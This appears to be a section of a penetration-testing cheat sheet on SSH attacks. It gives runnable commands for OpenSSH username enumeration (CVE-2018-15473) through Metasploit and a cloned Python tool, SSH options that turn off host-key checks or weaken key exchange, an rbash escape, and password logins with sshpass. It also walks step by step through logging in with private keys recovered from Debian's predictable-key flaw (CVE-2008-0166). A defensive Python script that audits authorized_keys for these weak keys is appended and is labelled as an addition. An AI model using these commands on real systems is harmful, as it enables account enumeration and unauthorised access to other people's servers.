22) SSH
User Enumeration (OpenSSH 7.7 | CVE-2018-15473)
## ------------------| Using MSF
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS <IP>
set USER_FILE userlist.txt
run
## ------------------| Using Python
git clone https://gitlab.com/epi052/cve-2018-15473.git && cd cve-2018-15473
pip install -r requirements.txt
python3 ssh-username-enum.py -w userlist.txt <IP>
SSH login with options
## ------------------| Disable SSH PubKeys [Used for windows with ssh]
ssh -o PubkeyAuthentication=no user@host
ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no user@host
ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss user@host
## ------------------| Prevents ssh from attempting to save the host key
ssh -o UserKnownHostsFile=/dev/null user@host
## ------------------| Instruct ssh to not prompt us to accept the host key
ssh -o StrictHostKeyChecking=no user@host
## ------------------| Escape rbash
ssh -t user@host bash
## ------------------| Using sshpass
sshpass -f <password_file> ssh <user>@<IP>
sshpass -p <password> ssh <user>@<IP>
CVE-2008-0166 (Debian-based systems | September 2006 <--> 2008 May 13th)
https://www.exploit-db.com/exploits/5720
Predictable PRNG Brute Force SSH
## ------------------| Info
## OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives)
## You need a copy of the authorized_keys file on your machine.
## ------------------| Setup
## Add "PubkeyAcceptedKeyTypes +ssh-dss" to /etc/ssh/ssh_config file
git clone https://github.com/g0tmi1k/debian-ssh
wget https://github.com/g0tmi1k/debian-ssh/raw/master/common_keys/debian_ssh_dsa_1024_x86.tar.bz2
wget https://github.com/g0tmi1k/debian-ssh/raw/master/common_keys/debian_ssh_rsa_2048_x86.tar.bz2
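## Extract each archive separately (tar -xf *.bz2 fails when the glob matches more than one file)
for f in *.tar.bz2; do tar -xjf "$f"; done
## Check whether any key in the repo matches an entry in the authorized_keys file.
## Copy the first 40 chars of the key in authorized_keys, then search for it in the repo
grep -lr 'AAAAB3NzaC1kc3MAAACBAOgzzMCD3Im5bRnAVdV3yLwTsyNA' .
## After finding the public key, the corresponding private key is in the same directory (same name without pub).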
ssh -i key -oKexAlgorithms=+diffie-hellman-group1-sha1 <USER>@$IP
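To audit a host's authorized_keys for CVE-2008-0166 keys so they can be removed, comparing whole key blobs is more reliable than grepping the first 40 characters, and it copes with option prefixes. This is an added example, not code from the original page or the debian-ssh project; it assumes the extracted archives store each public key in a file ending in `.pub`, and the function names are illustrative.

```python
import base64, hashlib, os, struct, sys

KEY_TYPES = ("ssh-rsa", "ssh-dss")  # key types in the weak-key archives

def key_blob(line):
    """Return the decoded key blob from an authorized_keys/.pub line, else None."""
    fields = line.split()
    for keytype, b64 in zip(fields, fields[1:]):
        if keytype not in KEY_TYPES:
            continue  # options such as from="..." or command="..." come first
        try:
            blob = base64.b64decode(b64, validate=True)
        except ValueError:
            continue  # "ssh-rsa" appeared inside a quoted option, keep scanning
        # A genuine blob begins with its own length-prefixed type name.
        if blob.startswith(struct.pack(">I", len(keytype)) + keytype.encode()):
            return blob
    return None

def weak_index(directory):
    """Map SHA-256(blob) -> path for every *.pub file under directory (assumed layout)."""
    index = {}
    for root, _dirs, files in os.walk(directory):
        for name in files:
            if name.endswith(".pub"):
                path = os.path.join(root, name)
                with open(path, errors="replace") as fh:
                    blob = key_blob(fh.read())
                if blob:
                    index[hashlib.sha256(blob).digest()] = path
    return index

def audit(authorized_keys, index):
    """Return (line number, matching weak .pub path) for each compromised entry."""
    hits = []
    with open(authorized_keys, errors="replace") as fh:
        for number, line in enumerate(fh, 1):
            blob = None if line.lstrip().startswith("#") else key_blob(line)
            digest = hashlib.sha256(blob).digest() if blob else None
            if digest in index:
                hits.append((number, index[digest]))
    return hits

if __name__ == "__main__":
    # usage: python3 audit_weak_keys.py <authorized_keys> <extracted key directory>
    for number, path in audit(sys.argv[1], weak_index(sys.argv[2])):
        print(f"line {number}: known-weak key ({path}); remove it and regenerate")
```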